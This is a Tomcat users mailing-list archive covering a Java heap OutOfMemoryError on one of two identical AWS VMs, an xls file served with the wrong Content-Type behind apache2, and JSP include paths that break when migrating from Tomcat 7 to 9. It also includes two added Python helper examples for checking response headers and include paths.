On 2/18/21 12:53 PM, Shawn Heisey wrote:

On 2/18/2021 12:11 PM, Niranjan Rao wrote:
Thank you the response. This is not a web application, but a 
standalone java program. Hence I said it's not a tomcat question, but 
a generic JVM question. I have been researching about this a lot and 
based on many mails on this list, lot of people here know about 
internal behavior of JVM and specs lot better than I do.


Apologies for getting that wrong.

Is it a custom app or something that you downloaded and installed?  
Talk to whoever wrote it.  They will hopefully know what information 
is needed to troubleshoot further.


Is Java 15 required for the application to function?  If you can 
successfully use Java 11 or even Java 8, you'll be dealing with a far 
more stable platform.  Major show-stopper bugs in Java are rare, but 
they do happen.  I will warn you that although I do recommend 
downgrading Java for stability purposes, I do not hold out a lot of 
hope that it will solve this problem.


Which garbage collector are you using?  I would recommend one of the 
really stable collectors, like G1.  I wrote this wiki page a long time 
ago that includes garbage collection information for Solr ... I think 
it would apply well to any application where latency is more important than 
throughput:


https://cwiki.apache.org/confluence/display/SOLR/ShawnHeisey

Thanks,
Shawn


I tried talking to the author, myself - but not much luck. Anyway, 
talking with myself does not help much with new ideas ;)


We added a lot of logging and wrote a simple throwaway tool to analyze 
the logs. Even though task counts are similar, there were some timeout 
errors that could be causing the leaks. Currently a patch is deployed 
and we are waiting to see if it has made any impact.


The interesting point was why one machine is getting the brunt of bad things. 
Maybe we will drop the box and spawn another VM on the assumption 
that the host could be heavily loaded or that something similar, not easily 
visible, is going on.


Your blog entry is very informative. Thank you.


Regards,


Niranjan





Re: Out of memory exception

2021-02-18 Thread Niranjan Rao

Hi Shawn

Thank you for the response. This is not a web application, but a standalone 
java program. Hence I said it's not a tomcat question, but a generic JVM 
question. I have been researching about this a lot and based on many 
mails on this list, a lot of people here know about internal behavior of 
JVM and specs a lot better than I do.


Both the boxes are spawned from same AWS image, we build the image. 
There is no other difference. Both receive tasks over MQ.  Tasks could 
be slightly different - like for different users, number of entities 
user holds etc, but they should not be too different or kind of should 
average out in the long run. We have examined the data for the tasks and 
nothing unusual has come out so far.


Regards,

Niranjan
On 2/18/21 10:59 AM, Shawn Heisey wrote:



On 2/18/2021 11:36 AM, Niranjan Rao wrote:
First apologies for non tomcat question. I have seen that there is 
enough expertise here to provide hints and hints are what I am 
looking for to solve the problem and question is generic enough. I 
have tried researching problem to best of my abilities.


I believe you're right to think this isn't a tomcat question. There 
are a lot of things it could be.  Tomcat is a *possible* source, 
though I think the chance of that is low.  Without a LOT of info that 
I would probably be useless at interpreting or asking for, it's 
impossible to say for sure.


With problems like this, it is normally the application running inside 
Tomcat that has a problem, not Tomcat itself.  You're likely to get a 
lot more useful information if you go to the people responsible for 
those applications.


We have a java program that regularly throws 
"java.lang.OutOfMemoryError: Java heap space" exception. Puzzling 
point is it happens only on one VM. We have a set of two VMs/boxes 
spawned from same AWS image. Machine class/region is exactly same and 
since they are from same image, they should be mostly identical 
except stuff like host name, ip address etc.


Number of tasks performed by VMs are comparable and not a significant 
difference. Yet, one VM never runs out of memory and the other one 
does. Sometimes it's as soon as half an hour after restarting the 
process while on the other box the process is running for days and no 
issues.


"Comparable" isn't "identical".

Are they running the same apps?  Which apps are involved?  Is the one 
that's throwing OOME handling substantially similar requests when 
compared to one that doesn't?  Is the request rate nearly the same, or 
is the problematic one handling a lot more?  Another applicable 
question, also off topic for this mailing list:  Are the apps in both 
cases configured identically?


I took memory dumps from both VMs and they look similar. Program is 
started with -Xmx1g flag and we have taken regular memory dumps. In 
many cases eclipse MAT reports total memory usage was less than 100MB 
when program crashed with out of memory exception.


That's extremely odd, unless the application requested a REALLY big 
chunk of memory such that the 100MB existing plus the new allocation 
would be larger than the max heap size of 1GB.


Do you have enough free memory that you could increase the max heap to 
2GB or beyond and see what happens?


Has anyone seen anything similar to this? Identical bits of code 
behaving differently? What else should I be looking for?


Earlier you said "comparable" and now you're saying "identical". So I 
have to ask ... which is it?  Remember that differences in 
configurations, types of requests, and request load can lead to very 
different requirements, even if the apps running inside Tomcat are the 
same.


Most of my experience in the Java world comes from Solr.  Apache Solr 
is a servlet application, and ships with Jetty.  Tomcat is not usually 
involved.  I joined this mailing list because I was responsible for 
Tomcat servers running apps developed in-house, and every once in a 
while, I needed to ask something tomcat-specific.


Thanks,
Shawn








Out of memory exception

2021-02-18 Thread Niranjan Rao

Greetings,


First apologies for non tomcat question. I have seen that there is 
enough expertise here to provide hints and hints are what I am looking 
for to solve the problem and question is generic enough. I have tried 
researching problem to best of my abilities.


It all happens on Ubuntu 20.04 and JDK 15

We have a java program that regularly throws 
"java.lang.OutOfMemoryError: Java heap space" exception. Puzzling point 
is it happens only on one VM. We have a set of two VMs/boxes spawned 
from same AWS image. Machine class/region is exactly same and since they 
are from same image, they should be mostly identical except stuff like 
host name, ip address etc.


Number of tasks performed by VMs are comparable and not a significant 
difference. Yet, one VM never runs out of memory and the other one does. 
Sometimes it's as soon as half an hour after restarting the process 
while on the other box the process is running for days and no issues.


I took memory dumps from both VMs and they look similar. Program is 
started with -Xmx1g flag and we have taken regular memory dumps. In many 
cases eclipse MAT reports total memory usage was less than 100MB when 
program crashed with out of memory exception.



Has anyone seen anything similar to this? Identical bits of code 
behaving differently? What else should I be looking for?



Regards,


Niranjan





Re: Tomcat server not considering Mime Type - Request urgent help!!

2021-01-14 Thread Niranjan Rao

What everyone is telling you is that the browser is not seeing the right headers.

You can modify your tomcat settings as well as apache2 settings to log 
the outgoing content type header. If tomcat and apache2 headers match, the 
problem is on your tomcat side. If there is a mismatch and tomcat is 
sending the right headers, then the problem is on the apache2 side. You can directly 
connect to tomcat using curl or even in the browser to bypass apache2 
and see if it works.


How is the response returned? How do you set the extension of the file? You 
said the file is generated dynamically; are you sure your servlet or whatever 
service handler you have there is not sending an incorrect header?


I am not sure, but I believe global mime type settings are only for 
static files that tomcat serves. Any dynamically generated content has 
to be managed by response handler. More knowledgeable people here can 
correct me if I am wrong.


Regards,

Niranjan

On 1/14/21 8:59 AM, Jonnalagadda, Swathi (External) wrote:

Could you please elaborate more on this as to where I need to check

From: Mounika Reddy 
Sent: Thursday, January 14, 2021 2:41 AM
To: Tomcat Users List 
Cc: Mark Thomas 
Subject: Re: Tomcat server not considering Mime Type - Request urgent help!!


If you are via AJP connector, then check if Apache proxy is changing
headers. We have a similar environment and when we set content-type,
clients see the same but possible it must be overriding

On Wed, Jan 13, 2021, 3:14 PM Jonnalagadda, Swathi (External) <
swathi.jonnalaga...@xerox.com> wrote:


This issue is not resolved yet.  The extension of file is clearly .xls but
I see content-type in response header is set to text/html.

Please note that the request initially hits apache2.4 server which is
redirected to tomcat9 server after successful authentication at siteminder.

The connection is configured via ajp connector.

Is there a possibility that the apache server is overwriting the
content-type header in response ?

Please advise.

Thanks
Swathi

-Original Message-
From: Jonnalagadda, Swathi (External) [mailto:
swathi.jonnalaga...@xerox.com]
Sent: Wednesday, January 13, 2021 1:57 PM
To: Tomcat Users List
Cc: Mark Thomas
Subject: RE: Tomcat server not considering Mime Type - Request urgent
help!!


Thank you for the email

We could see that when we try to open the xls file separately the browser
shows dialogue box to save it so it is nothing to do with browser settings

Could you please advise if I am missing out any setting here.

Thanks
Swathi
-Original Message-
From: Mounika Reddy [mailto:spidermai...@gmail.com]
Sent: Wednesday, January 13, 2021 3:48 AM
To: Tomcat Users List
Cc: Mark Thomas
Subject: Re: Tomcat server not considering Mime Type - Request urgent
help!!


Pls check http response headers for the request to confirm if it's
returning proper headers.

Once they are in place then it may be to do with browser settings not
processing headers.



On Tue, Jan 12, 2021, 2:48 PM Jonnalagadda, Swathi (External) <
swathi.jonnalaga...@xerox.com> wrote:


Hi Team

We have an application deployed in tomcat9.0.38 server which generates
an xls file dynamically and saves at server end. When we try to access
the file using application frontend, it is neither showing up in excel
format nor showing up pop up to save the file instead it is showing
the content of xls file in xml format directly on the browser.

Below mime type is set both at web.xml of the web application end and as
well as Tomcat9038/conf/web.xml

    <mime-mapping>
        <extension>xls</extension>
        <mime-type>application/vnd.ms-excel</mime-type>
    </mime-mapping>

Could you please help in resolving the issue ASAP


Thanks
Swathi




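The diagnostic Niranjan proposes above (compare the Content-Type Tomcat sends when reached directly with what arrives through apache2), written out as an added example; it is not code from the thread, and the response heads it parses are constructed samples in the shape `curl -i` prints, not captured traffic.

```python
"""Locate where a wrong Content-Type enters: Tomcat itself or the apache2
front end. Added example for this thread; the response heads are constructed."""
from typing import Dict, List, Tuple


def parse_response_head(raw: str) -> Tuple[str, Dict[str, List[str]]]:
    """Split a raw HTTP response head into the status line and a
    {lower-case-name: [values]} map. Repeated headers are all kept, because a
    proxy that appends a second Content-Type is itself a finding."""
    status, _, rest = raw.partition("\r\n")
    headers: Dict[str, List[str]] = {}
    for line in rest.split("\r\n"):
        if line == "":                      # blank line terminates the head
            break
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def media_type(headers: Dict[str, List[str]]) -> str:
    """Media type of the first Content-Type without parameters, lower-cased.
    Returns "" when the header is absent, which leaves the browser to sniff."""
    values = headers.get("content-type", [])
    return values[0].split(";")[0].strip().lower() if values else ""


def diagnose(tomcat_head: str, proxy_head: str, expected: str) -> str:
    """Decision from the thread: "tomcat" if the header is already wrong when
    Tomcat is reached directly, "apache2" if Tomcat is right but the value seen
    through the proxy differs, "ok" if both match what the servlet should send."""
    _, tomcat_headers = parse_response_head(tomcat_head)
    _, proxy_headers = parse_response_head(proxy_head)
    direct, via_proxy = media_type(tomcat_headers), media_type(proxy_headers)
    if direct != expected.lower():
        return "tomcat"
    if via_proxy != direct:
        return "apache2"
    return "ok"


# Constructed sample heads for the xls download discussed in the thread.
TOMCAT_DIRECT = ("HTTP/1.1 200 \r\nContent-Type: application/vnd.ms-excel\r\n"
                 "Content-Disposition: attachment; filename=report.xls\r\n\r\n")
VIA_APACHE = ("HTTP/1.1 200 OK\r\nServer: Apache\r\n"
              "Content-Type: text/html;charset=UTF-8\r\n\r\n")
TOMCAT_WRONG = "HTTP/1.1 200 \r\nContent-Type: text/html;charset=UTF-8\r\n\r\n"

if __name__ == "__main__":
    print(diagnose(TOMCAT_DIRECT, VIA_APACHE, "application/vnd.ms-excel"))  # apache2
    print(diagnose(TOMCAT_WRONG, TOMCAT_WRONG, "application/vnd.ms-excel"))  # tomcat
```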



Re: Version migration problems

2020-06-19 Thread Niranjan Rao

Hi Mark/Chris,

Thank you for the reply.

It's a spring application, related controllers/methods basically return 
page name as return "pages/Login".


The view resolver maps it to WEB-INF/jsp/pages/Login.jsp.

Login.jsp has entry that says



This entry gets resolved correctly in V7, but in V9 I get an error: cannot 
find pages/jsp/fragments/commonData.jsp.


After playing with it for a couple of hours, I figured out the full path works. So 
the issue seems to be that the root context/directory of the jsp engine, which was 
WEB-INF, has changed to the current directory where the page is getting loaded.

JSP generation still generates same line for both of them like following.

org.apache.jasper.runtime.JspRuntimeLibrary.include(request, response, 
"jsp/fragments/commonData.jsp", out, false);


But v9 interprets it relative to directory of current jsp that is in my 
case WEB-INF/jsp/pages and older engine interprets it relative to 
WEB-INF directory.


JDK version 1.8.0_111, Operating system is 16.04.6. It's same WAR file 
getting deployed in both tomcat versions. Only difference is server.xml 
has different ports.


Regards,

Niranjan
On 6/19/20 6:13 AM, Mark Thomas wrote:

On 19/06/2020 13:19, Christopher Schultz wrote:

Niranjan,

On 6/18/20 13:47, Niranjan Rao wrote:

I am trying to migrate from 7.0.73 to 9.0.36 and facing
challenges.
Java version and operating system version remains same in both
cases.

... and what are those versions?


I have carefully reviewed the configurations and everything looks
ok. Version 9 does not report any problems when starting the
application either in catalina.out file or in the application log
file.

Good.


Applications has bunch of JSP pages which sit under
WEB-INF/jsp/pages directory and some of these pages include
fragments from WEB-INF/jsp/fragments directory. In the older
version V7 this works correctly, but in V9 I get error about
include not found. Pages do get resolved correctly, but includes
do not.

Can you give some examples?

+1. The simplest test case that demonstrates the issue would be good.
That should be a JSP, a JSP fragment and the appropriate directory
structure.

Mark


Given only change is tomcat version as it's same WAR file deployed
on same operating system and same java version, I am thinking I am
missing some basic change in tomcat JSP lookup for version 9.



Can anyone please point me what I can be doing wrong or what I need
to do so that same WAR file works in both versions

-chris









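The path resolution Niranjan observes in 9.0.36 (a page attribute starting with "/" is context-relative, anything else is relative to the including JSP's directory, consistent with the JSP specification's relative-URL rules), as an added example that is not Tomcat or Jasper code. The regex that picks out `<jsp:include>` page attributes and the stand-in Login.jsp source are constructed simplifications for the demonstration.

```python
"""Resolve <jsp:include page="..."> paths as described in the thread and list
the includes in a JSP whose meaning changes between the two resolutions.
Added example; the regex is a simplification, not Jasper's parser."""
import posixpath
import re
from typing import List


def resolve_include(including_jsp: str, page: str) -> str:
    """Context-relative path an include resolves to. "." and ".." segments are
    normalised, and a path that would climb above the context root is rejected
    rather than silently clamped."""
    if page.startswith("/"):
        candidate = page                                    # context-relative
    else:
        candidate = posixpath.dirname(including_jsp) + "/" + page  # page-relative
    parts: List[str] = []
    for segment in candidate.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if not parts:
                raise ValueError("include escapes the context root: " + page)
            parts.pop()
        else:
            parts.append(segment)
    return "/" + "/".join(parts)


# Constructed matcher for the page attribute of <jsp:include ...>.
_INCLUDE_RE = re.compile(r'<jsp:include\b[^>]*?\bpage\s*=\s*"([^"]*)"')


def relative_includes(jsp_source: str) -> List[str]:
    """Page attributes that are not context-relative: the ones to review (or
    prefix with "/WEB-INF/...") when migrating pages that live under WEB-INF."""
    return [p for p in _INCLUDE_RE.findall(jsp_source) if not p.startswith("/")]


LOGIN_JSP = "/WEB-INF/jsp/pages/Login.jsp"
# Constructed stand-in for the Login.jsp source discussed in the thread.
LOGIN_SOURCE = (
    '<jsp:include page="jsp/fragments/commonData.jsp" />\n'
    '<jsp:include page="/WEB-INF/jsp/fragments/footer.jsp" flush="true"/>\n'
)

if __name__ == "__main__":
    # Page-relative resolution yields the path from the v9 error message.
    print(resolve_include(LOGIN_JSP, "jsp/fragments/commonData.jsp"))
    # A context-relative path, or a "../" path, reaches the fragment.
    print(resolve_include(LOGIN_JSP, "/WEB-INF/jsp/fragments/commonData.jsp"))
    print(resolve_include(LOGIN_JSP, "../fragments/commonData.jsp"))
    print(relative_includes(LOGIN_SOURCE))
```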



Version migration problems

2020-06-18 Thread Niranjan Rao

Greetings,


I am trying to migrate from 7.0.73 to 9.0.36 and facing challenges.


Java version and operating system version remains same in both cases.


I have carefully reviewed the configurations and everything looks ok. 
Version 9 does not report any problems when starting the application 
either in catalina.out file or in the application log file.



Applications has bunch of JSP pages which sit under WEB-INF/jsp/pages 
directory and some of these pages include fragments from 
WEB-INF/jsp/fragments directory. In the older version V7 this works 
correctly, but in V9 I get error about include not found. Pages do 
get resolved correctly, but includes do not.



Given only change is tomcat version as it's same WAR file deployed on 
same operating system and same java version, I am thinking I am missing 
some basic change in tomcat JSP lookup for version 9.



Can anyone please point me what I can be doing wrong or what I need to 
do so that same WAR file works in both versions



Regards,

Niranjan

